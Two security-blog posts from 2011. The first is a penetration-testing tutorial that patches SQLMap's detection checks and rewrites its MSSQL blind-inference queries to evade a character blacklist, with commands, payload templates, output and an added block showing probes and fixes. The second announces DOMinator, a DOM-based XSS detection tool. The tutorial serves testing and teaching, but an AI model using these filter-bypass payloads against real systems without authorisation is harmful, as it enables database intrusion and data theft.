Saturday, May 28, 2011

Customizing SQLMap to bypass weak (but effective) input filters

SQLMap is the most flexible SQL injection tool I have ever seen: written in Python, open source and fully customizable. Many times during penetration testing activities you will face the need to customize SQLMap.

In the following example the tool is not able to extract any data in its default configuration, since the application filters some particular characters.

Let's consider the following URL, where the "id" parameter is known to the tester to be vulnerable. Website URL vulnerable to SQL injection:
https://www.bank.ok/injection.aspx?id=1%2b1


Codebehind in "injection.aspx.vb":
-------
// Read the parameter, then delete a handful of characters before using it.
string id = Request.QueryString["id"];
id = id.Replace("'", "").Replace("\"", "").Replace("<", "").Replace(">", "").Replace("=", "");
// Still injectable: the filtered value is concatenated straight into the SQL statement.
Sql.execute("SELECT * FROM articles WHERE article_id = " + id);
-------
Problem:

Even though the data validation is crude, it definitely limits standard pentesting tools. As we can see from the SQLMap logs, the bisection algorithm cannot work if the ">" character is filtered. In addition, the initial checks will not be able to discover that the "id" parameter is injectable.

For example, the following request will fail:
./sqlmap.py -u "https://www.bank.ok/injection.aspx?id=5" -p "id" --dbs --dbms=mssql --string="This article is about politics"

Output: Error!

Solution:

To customize SQLMap for our purposes we need to accomplish three steps:
1) Disable all internal checks that are performed to see if a parameter is injectable;
2) Tune the database checks;
3) Rewrite the blind queries without the filtered characters (in this case "<", ">" and "=").


1) To disable the initial checks if you already know that a parameter is injectable, locate the following file in the SQLMap tree: sqlmap/lib/controller/checks.py

This addition makes SQLMap skip the control that checks whether the parameter is injectable or not. Since we already know that the parameter is injectable, the check is unnecessary.

Add the following line at line "98":
-------
return "numeric"
-------

After that, it is important to skip the database check:
2) Locate the file: sqlmap/plugins/dbms/mssqlserver.py

After checking whether the parameter is injectable, SQLMap checks whether the database is correct or not. For example, we may already know that the database is MSSQL thanks to the "convert()" check.

We can skip this check as well:

Modified the following lines at line "233":
-------
else:
    setDbms("Microsoft SQL Server")
    self.getBanner()
    kb.os = "Windows"
    return True
-------

3) To rewrite the logic behind inference, locate the following file: sqlmap/xml/queries.xml
In the following scenario I have rewritten the queries for MSSQL Server.

In particular, the "=" character is substituted with the "LIKE" operator and the ">" comparison is replaced by "BETWEEN ... AND", since the application filters the following character set: = (equal sign), < (left angle bracket), > (right angle bracket), " (double quote) and ' (single quote).



-------
<inference query="+ CASE WHEN (ASCII(SUBSTRING((%s), %d, 1))) BETWEEN %d+1 AND 500 THEN 0 ELSE 1 END--"/>

...

<blind query="SELECT %s..syscolumns.name FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.id LIKE %s..sysobjects.id AND %s..sysobjects.name LIKE '%s'"
       query2="SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns, %s..sysobjects WHERE %s..syscolumns.name LIKE '%s' AND %s..syscolumns.id LIKE %s..sysobjects.id AND %s..sysobjects.name LIKE '%s'"
       count="SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id LIKE (SELECT id FROM %s..sysobjects WHERE name LIKE '%s')"
       condition="[DB]..syscolumns.name"/>
-------
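To see why the Replace() blacklist in the code-behind is weak, and what actually closes the hole, here is an added Python example (not part of the original post and not SQLMap code): it reproduces the filter, checks which of two blind-inference probes pass through it unchanged, and contrasts that with an integer allowlist plus a bound-parameter query. The probe strings, the DB_NAME() subquery and the sqlite3 table are constructed for the illustration; sqlite3 stands in for SQL Server.

```python
import re
import sqlite3

# The blacklist from the page's code-behind: delete ' " < > = and nothing else.
FILTERED = ["'", '"', "<", ">", "="]


def strip_blacklist(value: str) -> str:
    """Reproduces the Replace() chain of injection.aspx: each listed character is removed."""
    for ch in FILTERED:
        value = value.replace(ch, "")
    return value


def survives_filter(payload: str) -> bool:
    """True when the filter leaves the payload byte-for-byte unchanged."""
    return strip_blacklist(payload) == payload


# Constructed samples: a greater-than probe of the kind the bisection algorithm needs,
# next to the page's BETWEEN rewrite with sample offsets filled in.
PROBE_GT = "5 AND ASCII(SUBSTRING((SELECT DB_NAME()), 1, 1)) > 64"
PROBE_BETWEEN = ("5 + CASE WHEN (ASCII(SUBSTRING((SELECT DB_NAME()), 1, 1))) "
                 "BETWEEN 64+1 AND 500 THEN 0 ELSE 1 END--")


# Mitigation 1: an allowlist for what the parameter is supposed to be (a small positive integer).
def validate_id(value: str):
    """Return the integer id, or None if the value is not strictly a decimal integer."""
    if re.fullmatch(r"[0-9]{1,9}", value) is None:
        return None
    return int(value)


# Mitigation 2: bind the value instead of concatenating it into the statement.
def lookup_article(raw_id: str):
    """Bound-parameter query over a constructed in-memory table; returns matching titles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (article_id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", [(5, "politics"), (6, "sport")])
    # The value is bound, never parsed as SQL: "5 + 1" is compared as a literal string,
    # unlike the page's id=1%2b1 URL where the server evaluated the expression.
    rows = conn.execute("SELECT title FROM articles WHERE article_id = ?", (raw_id,))
    return [row[0] for row in rows]
```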


The following command will now work. It will skip the parameter injection test and will perform the blind queries without using the filtered characters:

Command:

./sqlmap.py -u "https://www.bank.ok/injection.aspx?id=5" -p "id" --dbs --dbms=mssql --string="This article is about politics"


Databases:

[1 entry]
+----------+
| Politics |
+----------+

Wednesday, May 18, 2011

The DOMinator Project

Update: DOMinator goes Pro and is now available here.

Finally DOMinator is public!


What is DOMinator?
DOMinator is a Firefox-based tool for the analysis and identification of DOM Based Cross Site Scripting issues (DOMXss).
It is the first runtime tool that can help security testers identify DOMXss.

How does it work?

It uses a dynamic runtime tainting model on strings and can trace back taint propagation operations in order to understand whether a DOMXss vulnerability is actually exploitable.

You can find an introduction to the implementation flow and a description of the interface here.

What are the possibilities?

In the field of DOMXss the possibilities are almost infinite.
At the moment DOMinator can help in identifying reflected DOM Based XSS, but there is potential to extend it to stored DOMXss analysis.

Download

Start from the installation instructions, then have a look at the video.
Use the issues page to report problems, crashes or whatever else.
And finally subscribe to the DOMinator Mailing List to get live news.

Video
A video has been uploaded here to show how it works.


Soon I'll post more tutorials about the community version.


Some stats about DOM Xss

We downloaded the top Alexa 1 million sites and analyzed the first 100 in order to verify the presence of exploitable DOM Based Cross Site Scripting vulnerabilities.
Using DOMinator we found that 56 out of 100 (56% of sites) were vulnerable to reliable DOMXss attacks.
Some analysis examples can be found here and here.
We'll release a white paper about this research; in the meantime you can try to reproduce our results using DOMinator.

Future work

DOMinator is still in beta stage, but I see a lot of potential in this project.
For example I can think about:
  • The DOMinator library (SpiderMonkey) used in web security scanner projects for automated batch testing.
  • Logging that can be saved in a DB and analyzed later.
  • Per-page testing using Selenium/iMacros.
  • A version of DOMinator for XULRunner.
  • A lot more.
It only depends on how many people will help me in improving it.

So, if you're interested in contributing to the code (or in funding the project) let me know and I'll add you to the project contributors.
We have some commercial ideas about developing a more usable interface with our knowledge base, but we can assure you that the community version will always be open and free.

In the next few days I'll release a whitepaper about DOMinator describing the implementation choices and the technical details.

Stay tuned for more information about DOMinator... the best is yet to come.

Acknowledgements
DOMinator is a project sponsored by Minded Security, created and maintained by me (Stefano Di Paola).
I also want to thank Arshan Dabirsiaghi (Aspect Security), Gareth Heyes and Luca Carettoni (Matasano) for their feedback on the pre-pre-beta version :)

Finally, feel free to follow DOMinator news on Twitter as well by subscribing to @WisecWisec and @DOMXss.